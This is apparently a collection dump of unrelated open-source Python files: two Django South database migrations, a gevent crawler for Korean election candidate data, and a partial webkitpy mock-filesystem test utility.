lizardsystem/lizard-damage | lizard_damage/migrations/0025_auto__add_field_damagescenario_ahn_version.py | 1 | 9142 | # -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'DamageScenario.ahn_version'
db.add_column(u'lizard_damage_damagescenario', 'ahn_version',
self.gf('django.db.models.fields.CharField')(default=2, max_length=2),
keep_default=False)
def backwards(self, orm):
# Deleting field 'DamageScenario.ahn_version'
db.delete_column(u'lizard_damage_damagescenario', 'ahn_version')
models = {
u'lizard_damage.benefitscenario': {
'Meta': {'object_name': 'BenefitScenario'},
'datetime_created': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '128'}),
'expiration_date': ('django.db.models.fields.DateTimeField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'null': 'True', 'blank': 'True'}),
'status': ('django.db.models.fields.IntegerField', [], {'default': '1'}),
'zip_result': ('django.db.models.fields.files.FileField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'zip_risk_a': ('django.db.models.fields.files.FileField', [], {'max_length': '100'}),
'zip_risk_b': ('django.db.models.fields.files.FileField', [], {'max_length': '100'})
},
u'lizard_damage.benefitscenarioresult': {
'Meta': {'object_name': 'BenefitScenarioResult'},
'benefit_scenario': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['lizard_damage.BenefitScenario']"}),
'east': ('django.db.models.fields.FloatField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image': ('django.db.models.fields.files.FileField', [], {'max_length': '100'}),
'north': ('django.db.models.fields.FloatField', [], {}),
'south': ('django.db.models.fields.FloatField', [], {}),
'west': ('django.db.models.fields.FloatField', [], {})
},
u'lizard_damage.damageevent': {
'Meta': {'object_name': 'DamageEvent'},
'floodmonth': ('django.db.models.fields.IntegerField', [], {'default': '9'}),
'floodtime': ('django.db.models.fields.FloatField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'max_height': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'min_height': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'repairtime_buildings': ('django.db.models.fields.FloatField', [], {'default': '432000'}),
'repairtime_roads': ('django.db.models.fields.FloatField', [], {'default': '432000'}),
'repetition_time': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'scenario': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['lizard_damage.DamageScenario']"}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'null': 'True', 'blank': 'True'}),
'status': ('django.db.models.fields.IntegerField', [], {'default': '1'}),
'table': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'})
},
u'lizard_damage.damageeventresult': {
'Meta': {'object_name': 'DamageEventResult'},
'damage_event': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['lizard_damage.DamageEvent']"}),
'east': ('django.db.models.fields.FloatField', [], {}),
'geotransform_json': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'north': ('django.db.models.fields.FloatField', [], {}),
'relative_path': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'result_type': ('django.db.models.fields.CharField', [], {'max_length': '10'}),
'south': ('django.db.models.fields.FloatField', [], {}),
'west': ('django.db.models.fields.FloatField', [], {})
},
u'lizard_damage.damageeventwaterlevel': {
'Meta': {'ordering': "(u'index',)", 'object_name': 'DamageEventWaterlevel'},
'event': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['lizard_damage.DamageEvent']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'index': ('django.db.models.fields.IntegerField', [], {'default': '100'}),
'waterlevel_path': ('django.db.models.fields.FilePathField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'})
},
u'lizard_damage.damagescenario': {
'Meta': {'object_name': 'DamageScenario'},
'ahn_version': ('django.db.models.fields.CharField', [], {'default': '2', 'max_length': '2'}),
'calc_type': ('django.db.models.fields.IntegerField', [], {'default': '2'}),
'customheights': ('django.db.models.fields.FilePathField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'customlanduse': ('django.db.models.fields.FilePathField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'customlandusegeoimage': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['lizard_damage.GeoImage']", 'null': 'True', 'blank': 'True'}),
'damagetable_file': ('django.db.models.fields.FilePathField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'datetime_created': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '128'}),
'expiration_date': ('django.db.models.fields.DateTimeField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'scenario_type': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'null': 'True', 'blank': 'True'}),
'status': ('django.db.models.fields.IntegerField', [], {'default': '1'})
},
u'lizard_damage.geoimage': {
'Meta': {'object_name': 'GeoImage'},
'east': ('django.db.models.fields.FloatField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image': ('django.db.models.fields.files.FileField', [], {'max_length': '100'}),
'north': ('django.db.models.fields.FloatField', [], {}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50'}),
'south': ('django.db.models.fields.FloatField', [], {}),
'west': ('django.db.models.fields.FloatField', [], {})
},
u'lizard_damage.riskresult': {
'Meta': {'object_name': 'RiskResult'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'scenario': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['lizard_damage.DamageScenario']"}),
'zip_risk': ('django.db.models.fields.files.FileField', [], {'max_length': '100'})
},
u'lizard_damage.roads': {
'Meta': {'object_name': 'Roads', 'db_table': "u'data_roads'"},
'gid': ('django.db.models.fields.IntegerField', [], {'primary_key': 'True'}),
'gridcode': ('django.db.models.fields.SmallIntegerField', [], {'null': 'True', 'blank': 'True'}),
'the_geom': ('django.contrib.gis.db.models.fields.MultiPolygonField', [], {'srid': '28992', 'null': 'True', 'blank': 'True'}),
'typeinfr_1': ('django.db.models.fields.CharField', [], {'max_length': '25', 'blank': 'True'}),
'typeweg': ('django.db.models.fields.CharField', [], {'max_length': '120', 'blank': 'True'})
},
u'lizard_damage.unit': {
'Meta': {'object_name': 'Unit'},
'factor': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True', 'blank': 'True'})
}
}
complete_apps = ['lizard_damage'] | gpl-3.0 | 5,769,901,754,726,166,000 | 69.330769 | 163 | 0.550427 | false |
KamranMackey/readthedocs.org | readthedocs/projects/migrations/0041_add_programming_language.py | 8 | 12231 | # -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'Project.programming_language'
db.add_column(u'projects_project', 'programming_language',
self.gf('django.db.models.fields.CharField')(default='none', max_length=20),
keep_default=False)
def backwards(self, orm):
# Deleting field 'Project.programming_language'
db.delete_column(u'projects_project', 'programming_language')
models = {
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Group']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Permission']"}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
u'builds.version': {
'Meta': {'ordering': "['-verbose_name']", 'unique_together': "[('project', 'slug')]", 'object_name': 'Version'},
'active': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'built': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'identifier': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'machine': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'privacy_level': ('django.db.models.fields.CharField', [], {'default': "'public'", 'max_length': '20'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'versions'", 'to': u"orm['projects.Project']"}),
'slug': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'supported': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'type': ('django.db.models.fields.CharField', [], {'default': "'unknown'", 'max_length': '20'}),
'uploaded': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'verbose_name': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'projects.emailhook': {
'Meta': {'object_name': 'EmailHook'},
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'emailhook_notifications'", 'to': u"orm['projects.Project']"})
},
u'projects.importedfile': {
'Meta': {'object_name': 'ImportedFile'},
'commit': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'md5': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'path': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'imported_files'", 'to': u"orm['projects.Project']"}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50'}),
'version': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'imported_filed'", 'null': 'True', 'to': u"orm['builds.Version']"})
},
u'projects.project': {
'Meta': {'ordering': "('slug',)", 'object_name': 'Project'},
'analytics_code': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True', 'blank': 'True'}),
'canonical_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
'conf_py_file': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '255', 'blank': 'True'}),
'copyright': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'default_branch': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '255', 'null': 'True', 'blank': 'True'}),
'default_version': ('django.db.models.fields.CharField', [], {'default': "'latest'", 'max_length': '255'}),
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'django_packages_url': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'documentation_type': ('django.db.models.fields.CharField', [], {'default': "'sphinx'", 'max_length': '20'}),
'featured': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'language': ('django.db.models.fields.CharField', [], {'default': "'en'", 'max_length': '20'}),
'main_language_project': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'translations'", 'null': 'True', 'to': u"orm['projects.Project']"}),
'mirror': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'modified_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'num_major': ('django.db.models.fields.IntegerField', [], {'default': '2', 'max_length': '3', 'null': 'True', 'blank': 'True'}),
'num_minor': ('django.db.models.fields.IntegerField', [], {'default': '2', 'max_length': '3', 'null': 'True', 'blank': 'True'}),
'num_point': ('django.db.models.fields.IntegerField', [], {'default': '2', 'max_length': '3', 'null': 'True', 'blank': 'True'}),
'path': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'privacy_level': ('django.db.models.fields.CharField', [], {'default': "'public'", 'max_length': '20'}),
'programming_language': ('django.db.models.fields.CharField', [], {'default': "'none'", 'max_length': '20'}),
'project_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
'pub_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'python_interpreter': ('django.db.models.fields.CharField', [], {'default': "'python'", 'max_length': '20'}),
'related_projects': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': u"orm['projects.Project']", 'null': 'True', 'through': u"orm['projects.ProjectRelationship']", 'blank': 'True'}),
'repo': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}),
'repo_type': ('django.db.models.fields.CharField', [], {'default': "'git'", 'max_length': '10'}),
'requirements_file': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '255', 'null': 'True', 'blank': 'True'}),
'single_version': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'skip': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '255'}),
'suffix': ('django.db.models.fields.CharField', [], {'default': "'.rst'", 'max_length': '10'}),
'theme': ('django.db.models.fields.CharField', [], {'default': "'default'", 'max_length': '20'}),
'use_system_packages': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'use_virtualenv': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'users': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'projects'", 'symmetrical': 'False', 'to': u"orm['auth.User']"}),
'version': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}),
'version_privacy_level': ('django.db.models.fields.CharField', [], {'default': "'public'", 'max_length': '20'})
},
u'projects.projectrelationship': {
'Meta': {'object_name': 'ProjectRelationship'},
'child': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'superprojects'", 'to': u"orm['projects.Project']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'subprojects'", 'to': u"orm['projects.Project']"})
},
u'projects.webhook': {
'Meta': {'object_name': 'WebHook'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'webhook_notifications'", 'to': u"orm['projects.Project']"}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'})
}
}
complete_apps = ['projects'] | mit | -3,244,198,992,383,329,000 | 82.210884 | 232 | 0.557436 | false |
teampopong/crawlers | election_commission/crawlers/assembly/base.py | 3 | 3547 | #!/usr/bin/python2.7
# -*- encoding=utf-8 -*-
import gevent
from gevent import monkey
import itertools
from urlparse import urljoin
from utils import flatten, get_json, get_xpath, parse_cell, sanitize, split
monkey.patch_all()
class BaseCrawler(object):
url_image_base = 'http://info.nec.go.kr'
attrs = []
attrs_exclude_parse_cell = ['image']
def parse(self, url, city_name=None):
elems = get_xpath(url, '//td')
num_attrs = len(self.attrs)
members = (dict(zip(self.attrs, elems[i*num_attrs:(i+1)*num_attrs]))\
for i in xrange(len(elems) / num_attrs))
members = [self.parse_member(member, city_name=city_name) for member in members]
print 'crawled #%d - %s(%d)...' % (self.nth, city_name or '๋น๋ก๋ํ', len(members))
return members
def parse_record(self, record):
for attr in self.attrs:
if attr not in self.attrs_exclude_parse_cell:
record[attr] = parse_cell(record[attr])
def parse_member(self, member, city_name=None):
self.parse_record(member)
# never change the order
member['assembly_no'] = self.nth
member['elected'] = self.__class__.__name__.startswith('Elected')
self.parse_member_image(member)
self.parse_member_name(member)
self.parse_member_birth(member)
self.parse_member_district(member, city_name)
self.parse_member_vote(member)
return member
def parse_member_image(self, member):
if 'image' not in member: return
rel_path = member['image'].find("./input[@type='image']").attrib['src']
member['image'] = urljoin(self.url_image_base, rel_path)
def parse_member_name(self, member):
if 'name' not in member: return
member['name_kr'], member['name_cn'] = map(sanitize, member['name'][:2])
del member['name']
def parse_member_birth(self, member):
if 'birth' not in member: return
member['birthyear'], member['birthmonth'], member['birthday'] =\
split(member['birth'][0])
del member['birth']
def parse_member_district(self, member, city_name):
if city_name:
member['district'] = '%s %s' % (city_name, member['district'])
def parse_member_vote(self, member):
if 'vote' not in member: return
member['votenum'], member['voterate'] = map(sanitize, member['vote'][:2])
member['votenum'] = member['votenum'].replace(',', '')
del member['vote']
class MultiCityCrawler(BaseCrawler):
def city_codes(self):
list_ = get_json(self.url_city_codes_json)['body']
return map(lambda x: (x['CODE'], x['NAME']), list_)
def url_list(self, city_code):
return self.url_list_base + str(city_code)
def crawl(self):
# ์ง์ญ๊ตฌ ๋ํ
jobs = []
for city_code, city_name in self.city_codes():
req_url = self.url_list(city_code)
job = gevent.spawn(self.parse, req_url, city_name)
jobs.append(job)
gevent.joinall(jobs)
people = flatten(job.get() for job in jobs)
# ๋น๋ก๋ํ
if hasattr(self, 'prop_crawler'):
prop_people = self.prop_crawler.crawl()
for person in prop_people:
person['district'] = '๋น๋ก๋ํ'
people.extend(prop_people)
return people
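# Hedged usage sketch (a concrete crawler subclass is assumed to define nth,
# attrs, url_city_codes_json and url_list_base):
#
#   people = SomeAssemblyCrawler().crawl()
#   # -> list of member dicts, with districts prefixed by their city name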
class SinglePageCrawler(BaseCrawler):
def crawl(self):
people = self.parse(self.url_list)
return people
| agpl-3.0 | -7,241,243,713,288,136,000 | 31.229358 | 88 | 0.59351 | false |
axinging/sky_engine | sky/tools/webkitpy/common/system/filesystem_mock.py | 11 | 16806 | # Copyright (C) 2009 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import StringIO
import errno
import hashlib
import os
import re
from webkitpy.common.system import path
class MockFileSystem(object):
sep = '/'
pardir = '..'
def __init__(self, files=None, dirs=None, cwd='/'):
"""Initializes a "mock" filesystem that can be used to completely
stub out a filesystem.
Args:
files: a dict of filenames -> file contents. A file contents
value of None is used to indicate that the file should
not exist.
"""
self.files = files or {}
self.written_files = {}
self.last_tmpdir = None
self.current_tmpno = 0
self.cwd = cwd
self.dirs = set(dirs or [])
self.dirs.add(cwd)
for f in self.files:
d = self.dirname(f)
while not d in self.dirs:
self.dirs.add(d)
d = self.dirname(d)
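    # Illustrative construction (hypothetical paths): passing
    # files={'/test/a.txt': 'contents'} makes '/test' a directory via the loop
    # above (the cwd '/' is added separately), so isdir('/test') is True.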
def clear_written_files(self):
# This function can be used to track what is written between steps in a test.
self.written_files = {}
def _raise_not_found(self, path):
raise IOError(errno.ENOENT, path, os.strerror(errno.ENOENT))
def _split(self, path):
# This is not quite a full implementation of os.path.split
# http://docs.python.org/library/os.path.html#os.path.split
if self.sep in path:
return path.rsplit(self.sep, 1)
return ('', path)
def abspath(self, path):
if os.path.isabs(path):
return self.normpath(path)
return self.abspath(self.join(self.cwd, path))
def realpath(self, path):
return self.abspath(path)
def basename(self, path):
return self._split(path)[1]
def expanduser(self, path):
if path[0] != "~":
return path
parts = path.split(self.sep, 1)
home_directory = self.sep + "Users" + self.sep + "mock"
if len(parts) == 1:
return home_directory
return home_directory + self.sep + parts[1]
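    # e.g. (illustrative): expanduser('~') -> '/Users/mock' and
    # expanduser('~/foo') -> '/Users/mock/foo'; paths without a leading '~'
    # are returned unchanged.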
def path_to_module(self, module_name):
return "/mock-checkout/third_party/WebKit/tools/" + module_name.replace('.', '/') + ".py"
def chdir(self, path):
path = self.normpath(path)
if not self.isdir(path):
raise OSError(errno.ENOENT, path, os.strerror(errno.ENOENT))
self.cwd = path
def copyfile(self, source, destination):
if not self.exists(source):
self._raise_not_found(source)
if self.isdir(source):
raise IOError(errno.EISDIR, source, os.strerror(errno.EISDIR))
if self.isdir(destination):
raise IOError(errno.EISDIR, destination, os.strerror(errno.EISDIR))
if not self.exists(self.dirname(destination)):
raise IOError(errno.ENOENT, destination, os.strerror(errno.ENOENT))
self.files[destination] = self.files[source]
self.written_files[destination] = self.files[source]
def dirname(self, path):
return self._split(path)[0]
def exists(self, path):
return self.isfile(path) or self.isdir(path)
def files_under(self, path, dirs_to_skip=[], file_filter=None):
def filter_all(fs, dirpath, basename):
return True
file_filter = file_filter or filter_all
files = []
if self.isfile(path):
if file_filter(self, self.dirname(path), self.basename(path)) and self.files[path] is not None:
files.append(path)
return files
if self.basename(path) in dirs_to_skip:
return []
if not path.endswith(self.sep):
path += self.sep
dir_substrings = [self.sep + d + self.sep for d in dirs_to_skip]
for filename in self.files:
if not filename.startswith(path):
continue
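            # Keep the leading separator on |suffix| so that dir_substrings
            # (each of the form "/<dir>/") can match a skipped directory that
            # sits immediately below |path|.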
suffix = filename[len(path) - 1:]
if any(dir_substring in suffix for dir_substring in dir_substrings):
continue
dirpath, basename = self._split(filename)
if file_filter(self, dirpath, basename) and self.files[filename] is not None:
files.append(filename)
return files
def getcwd(self):
return self.cwd
def glob(self, glob_string):
# FIXME: This handles '*', but not '?', '[', or ']'.
glob_string = re.escape(glob_string)
glob_string = glob_string.replace('\\*', '[^\\/]*') + '$'
glob_string = glob_string.replace('\\/', '/')
path_filter = lambda path: re.match(glob_string, path)
# We could use fnmatch.fnmatch, but that might not do the right thing on windows.
existing_files = [path for path, contents in self.files.items() if contents is not None]
return filter(path_filter, existing_files) + filter(path_filter, self.dirs)
def isabs(self, path):
return path.startswith(self.sep)
def isfile(self, path):
return path in self.files and self.files[path] is not None
def isdir(self, path):
return self.normpath(path) in self.dirs
def _slow_but_correct_join(self, *comps):
return re.sub(re.escape(os.path.sep), self.sep, os.path.join(*comps))
def join(self, *comps):
# This function is called a lot, so we optimize it; there are
# unittests to check that we match _slow_but_correct_join(), above.
path = ''
sep = self.sep
for comp in comps:
if not comp:
continue
if comp[0] == sep:
path = comp
continue
if path:
path += sep
path += comp
if comps[-1] == '' and path:
path += '/'
path = path.replace(sep + sep, sep)
return path
def listdir(self, path):
root, dirs, files = list(self.walk(path))[0]
return dirs + files
def walk(self, top):
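        # Unlike os.walk(), this mock does not recurse: it returns a single
        # (dirpath, dirnames, filenames) tuple describing the immediate
        # children of |top|.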
sep = self.sep
if not self.isdir(top):
raise OSError("%s is not a directory" % top)
if not top.endswith(sep):
top += sep
dirs = []
files = []
for f in self.files:
if self.exists(f) and f.startswith(top):
remaining = f[len(top):]
if sep in remaining:
dir = remaining[:remaining.index(sep)]
if not dir in dirs:
dirs.append(dir)
else:
files.append(remaining)
return [(top[:-1], dirs, files)]
def mtime(self, path):
if self.exists(path):
return 0
self._raise_not_found(path)
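    # _mktemp() only reserves a unique path; it does not create anything on
    # the mock filesystem. mkdtemp() below wraps it and actually creates the
    # directory.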
def _mktemp(self, suffix='', prefix='tmp', dir=None, **kwargs):
if dir is None:
dir = self.sep + '__im_tmp'
curno = self.current_tmpno
self.current_tmpno += 1
self.last_tmpdir = self.join(dir, '%s_%u_%s' % (prefix, curno, suffix))
return self.last_tmpdir
def mkdtemp(self, **kwargs):
class TemporaryDirectory(object):
def __init__(self, fs, **kwargs):
self._kwargs = kwargs
self._filesystem = fs
self._directory_path = fs._mktemp(**kwargs)
fs.maybe_make_directory(self._directory_path)
def __str__(self):
return self._directory_path
def __enter__(self):
return self._directory_path
def __exit__(self, type, value, traceback):
# Only self-delete if necessary.
# FIXME: Should we delete non-empty directories?
if self._filesystem.exists(self._directory_path):
self._filesystem.rmtree(self._directory_path)
return TemporaryDirectory(fs=self, **kwargs)
def maybe_make_directory(self, *path):
norm_path = self.normpath(self.join(*path))
while norm_path and not self.isdir(norm_path):
self.dirs.add(norm_path)
norm_path = self.dirname(norm_path)
def move(self, source, destination):
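        # A file move is modeled as a copy plus marking the source deleted;
        # directory moves fall through to copytree() + rmtree().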
if not self.exists(source):
self._raise_not_found(source)
if self.isfile(source):
self.files[destination] = self.files[source]
self.written_files[destination] = self.files[destination]
self.files[source] = None
self.written_files[source] = None
return
self.copytree(source, destination)
self.rmtree(source)
def _slow_but_correct_normpath(self, path):
return re.sub(re.escape(os.path.sep), self.sep, os.path.normpath(path))
def normpath(self, path):
# This function is called a lot, so we try to optimize the common cases
# instead of always calling _slow_but_correct_normpath(), above.
if '..' in path or '/./' in path:
# This doesn't happen very often; don't bother trying to optimize it.
return self._slow_but_correct_normpath(path)
if not path:
return '.'
if path == '/':
return path
if path == '/.':
return '/'
if path.endswith('/.'):
return path[:-2]
if path.endswith('/'):
return path[:-1]
return path
def open_binary_tempfile(self, suffix=''):
path = self._mktemp(suffix)
return (WritableBinaryFileObject(self, path), path)
def open_binary_file_for_reading(self, path):
if self.files[path] is None:
self._raise_not_found(path)
return ReadableBinaryFileObject(self, path, self.files[path])
def read_binary_file(self, path):
# Intentionally raises KeyError if we don't recognize the path.
if self.files[path] is None:
self._raise_not_found(path)
return self.files[path]
def write_binary_file(self, path, contents):
# FIXME: should this assert if dirname(path) doesn't exist?
self.maybe_make_directory(self.dirname(path))
self.files[path] = contents
self.written_files[path] = contents
def open_text_file_for_reading(self, path):
if self.files[path] is None:
self._raise_not_found(path)
return ReadableTextFileObject(self, path, self.files[path])
def open_text_file_for_writing(self, path):
return WritableTextFileObject(self, path)
def read_text_file(self, path):
return self.read_binary_file(path).decode('utf-8')
def write_text_file(self, path, contents):
return self.write_binary_file(path, contents.encode('utf-8'))
def sha1(self, path):
contents = self.read_binary_file(path)
return hashlib.sha1(contents).hexdigest()
def relpath(self, path, start='.'):
# Since os.path.relpath() calls os.path.normpath()
# (see http://docs.python.org/library/os.path.html#os.path.abspath )
# it also removes trailing slashes and converts forward and backward
# slashes to the preferred slash os.sep.
start = self.abspath(start)
path = self.abspath(path)
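        # Climb from |start| toward the root until we find a prefix shared
        # with |path|, collecting one '..' component per level climbed.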
common_root = start
dot_dot = ''
while not common_root == '':
if path.startswith(common_root):
break
common_root = self.dirname(common_root)
